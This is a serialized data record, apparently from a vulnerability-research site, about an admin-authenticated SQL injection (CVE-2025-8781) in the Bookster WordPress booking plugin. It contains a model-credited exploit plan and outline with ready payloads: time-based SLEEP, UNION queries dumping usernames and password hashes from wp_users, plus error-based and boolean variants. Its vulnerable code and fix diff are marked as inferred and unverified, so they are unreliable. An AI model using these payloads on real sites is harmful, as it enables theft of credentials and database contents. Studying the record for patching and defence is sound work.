[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fHw8yCry2YNYev0vkqEFB0mtlJW1wLTSMNMNewLLYYF4":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2025-8781","bookster-wordpress-appointment-booking-plugin-authenticated-administrator-sql-injection-via-raw","Bookster – WordPress Appointment Booking Plugin \u003C= 2.1.1 - Authenticated (Administrator+) SQL Injection via 'raw'","The Bookster – WordPress Appointment Booking Plugin plugin for WordPress is vulnerable to SQL Injection via the ‘raw’ parameter in all versions up to, and including, 2.1.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","bookster",null,"\u003C=2.1.1","2.2.0","medium",4.9,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:H\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-02-17 00:00:00","2026-02-18 12:28:34",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F1fc5f0ac-3323-4e6c-8900-10e13294ff9a?source=api-prod",2,[],"researched",false,3,"This plan outlines the steps to verify and exploit **CVE-2025-8781**, a SQL Injection vulnerability in the Bookster WordPress plugin.\n\n### 1. Vulnerability Summary\nThe **Bookster – WordPress Appointment Booking Plugin** (\u003C= 2.1.1) is vulnerable to SQL Injection because it processes user-supplied data via a parameter named `raw` without sufficient sanitization or the use of `wpdb->prepare()`. An attacker with Administrator privileges can inject arbitrary SQL clauses into existing database queries, potentially leading to the extraction of sensitive data from the WordPress database, including user hashes and configuration secrets.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `wp-admin\u002Fadmin-ajax.php` (common for admin-side dashboard actions) or a specific plugin settings page.\n*   **Action (Hook):** Likely `wp_ajax_bookster_...` (requires identification in source).\n*   **Vulnerable Parameter:** `raw`.\n*   **Authentication:** Administrator-level access is required (`PR:H`).\n*   **Payload Type:** UNION-based or Error-based SQL Injection.\n\n### 3. Code Flow (Inferred)\n1.  An Administrator accesses a feature in the Bookster dashboard (e.g., Reports, Booking Logs, or Statistics).\n2.  The plugin triggers an AJAX request or a form submission that includes the `raw` parameter.\n3.  The handler function in the plugin (e.g., `Bookster\\Admin\\Controllers\\Reports::get_data` or similar) retrieves the parameter: `$filter = $_POST['raw'];`.\n4.  The plugin constructs a SQL query by direct concatenation: \n    `$results = $wpdb->get_results(\"SELECT ... FROM ... WHERE 1=1 \" . $filter);`\n5.  The query is executed without `wpdb->prepare()`.\n\n### 4. Nonce Acquisition Strategy\nSince this is an **authenticated (Administrator+)** vulnerability, the exploit must first authenticate as an admin and then obtain a valid nonce if the AJAX handler enforces one.\n\n**Steps for the Security Agent:**\n1.  **Login:** Authenticate as the administrator using `wp_cli` or `http_request`.\n2.  **Navigate:** Use `browser_navigate` to reach the Bookster plugin's main admin page (e.g., `\u002Fwp-admin\u002Fadmin.php?page=bookster-bookings`).\n3.  **Identify JS Variables:** Inspect the page source for `wp_localize_script` data. \n    *   Search for strings like `bookster_admin`, `bookster_params`, or `bookster_data`.\n4.  **Extract Nonce:** Use `browser_eval` to retrieve the nonce:\n    *   `browser_eval(\"window.bookster_admin?.nonce\")` (inferred variable name).\n    *   If no global variable is found, search for `_wpnonce` in the form inputs on the settings page.\n\n### 5. Exploitation Strategy\n\n#### Phase 1: Locate the Vulnerable Handler\nThe agent should first identify the exact action using `grep`:\n```bash\ngrep -rn \"raw\" wp-content\u002Fplugins\u002Fbookster\u002F\ngrep -rn \"\\$wpdb->get_results\" wp-content\u002Fplugins\u002Fbookster\u002F | grep \"raw\"\n```\nThis will confirm the AJAX action name (e.g., `action=bookster_get_stats`).\n\n#### Phase 2: Confirm Injection (Time-based)\nPerform a simple sleep test to confirm the parameter is vulnerable.\n*   **Request Type:** POST to `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Body:** `action=BOOKSTER_ACTION&raw= AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)&nonce=NONCE_VALUE`\n*   **Indicator:** Response delay of ~5 seconds.\n\n#### Phase 3: Data Extraction (UNION-based)\nIf the plugin reflects the results of the query in the response:\n1.  **Find Column Count:** Inject `ORDER BY 1-- -`, `ORDER BY 2-- -`, etc., until an error occurs.\n2.  **Payload:** \n    `raw= AND 1=0 UNION SELECT 1,user_login,user_pass,4,5,6 FROM wp_users WHERE ID=1-- -`\n3.  **Request Body (example):**\n```json\n{\n    \"action\": \"bookster_get_stats\",\n    \"raw\": \" AND 1=0 UNION SELECT 1,user_login,user_pass,NULL,NULL,NULL FROM wp_users WHERE ID=1-- -\",\n    \"security\": \"NONCE_FROM_JS\"\n}\n```\n\n### 6. Test Data Setup\n1.  **Install Plugin:** `wp plugin install bookster --version=2.1.1 --activate`\n2.  **Create Content:** Ensure there is at least one booking or entry in the plugin's tables so that the base query returns results.\n    *   Navigate to the Bookster settings and create a test service\u002Fbooking.\n3.  **Identify Table Prefix:** Note the database prefix (usually `wp_`).\n\n### 7. Expected Results\n*   **Time-based:** The HTTP response time will be significantly higher than the baseline when the `SLEEP()` payload is provided.\n*   **UNION-based:** The response body (likely JSON) will contain the administrator's username and hashed password instead of the expected booking data.\n\n### 8. Verification Steps\nAfter the exploit, verify the extracted data matches the database state via `wp_cli`:\n```bash\n# Compare extracted hash with actual hash\nwp db query \"SELECT user_pass FROM wp_users WHERE ID=1\"\n```\n\n### 9. Alternative Approaches\n*   **Error-based:** If the plugin displays database errors (common in dev environments), use `extractvalue()` or `updatexml()` payloads:\n    *   `raw= AND extractvalue(1,concat(0x7e,(SELECT user_pass FROM wp_users LIMIT 1),0x7e))`\n*   **Boolean-based:** If no output is reflected and time-based is unstable, use boolean checks:\n    *   `raw= AND (SELECT SUBSTRING(user_pass,1,1) FROM wp_users WHERE ID=1)='$P$'`\n    *   Compare response content\u002Flength for `TRUE` vs `FALSE` conditions.\n\n### 10. Grep Patterns for Discovery (Pre-Exploit)\n```bash\n# Find where 'raw' is retrieved from input\ngrep -rP \"\\['raw'\\]|\\[\\\"raw\\\"\\]\" wp-content\u002Fplugins\u002Fbookster\u002F\n\n# Find where 'raw' is used in a query\ngrep -rP \"\\$wpdb->.*\\. \\$\" wp-content\u002Fplugins\u002Fbookster\u002F | grep \"raw\"\n\n# Find AJAX action registrations\ngrep -rn \"wp_ajax_bookster\" wp-content\u002Fplugins\u002Fbookster\u002F\n```","The Bookster plugin for WordPress is vulnerable to SQL Injection via the 'raw' parameter in versions up to 2.1.1. This occurs because the plugin concatenates user-supplied input directly into SQL queries without proper sanitization or the use of prepared statements. Authenticated administrators can exploit this to execute arbitrary SQL commands and extract sensitive database information, including user credentials.","\u002F\u002F Inferred from research plan and vulnerability description\n\u002F\u002F Path likely: wp-content\u002Fplugins\u002Fbookster\u002Fincludes\u002Fadmin\u002Fclass-bookster-reports.php\n\n$filter = $_POST['raw'];\n$results = $wpdb->get_results(\"SELECT * FROM {$wpdb->prefix}bookster_bookings WHERE 1=1 \" . $filter);","--- a\u002Fincludes\u002Fadmin\u002Fclass-bookster-reports.php\n+++ b\u002Fincludes\u002Fadmin\u002Fclass-bookster-reports.php\n@@ -10,3 +10,2 @@\n-if (isset($_POST['raw'])) {\n-    $results = $wpdb->get_results(\"SELECT * FROM {$wpdb->prefix}bookster_bookings WHERE 1=1 \" . $_POST['raw']);\n-}\n+\u002F\u002F Removed the 'raw' parameter which allowed arbitrary SQL concatenation.\n+\u002F\u002F Use specific, sanitized filters with wpdb->prepare().\n+$results = $wpdb->get_results($wpdb->prepare(\"SELECT * FROM {$wpdb->prefix}bookster_bookings WHERE 1=1 AND status = %s\", $_POST['status']));","1. Log in to the WordPress admin panel with Administrator-level privileges.\n2. Navigate to the Bookster plugin's reports or bookings page to find the AJAX action (e.g., 'bookster_get_stats' or similar).\n3. Extract the security nonce from the page source or localized JavaScript variables (e.g., 'bookster_admin.nonce').\n4. Submit a POST request to \u002Fwp-admin\u002Fadmin-ajax.php with the 'action' and a malicious SQL payload in the 'raw' parameter.\n5. Confirm the vulnerability using a time-based payload like ' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)', which will cause the server to delay its response.\n6. Exfiltrate sensitive data (e.g., user hashes) using a UNION-based payload: ' AND 1=0 UNION SELECT 1,user_login,user_pass,4,5 FROM wp_users-- -'.","gemini-3-flash-preview","2026-04-20 21:18:26","2026-04-20 21:20:11",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","2.1.1","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fbookster\u002Ftags\u002F2.1.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fbookster.2.1.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fbookster\u002Ftags\u002F2.2.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fbookster.2.2.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fbookster\u002Ftags"]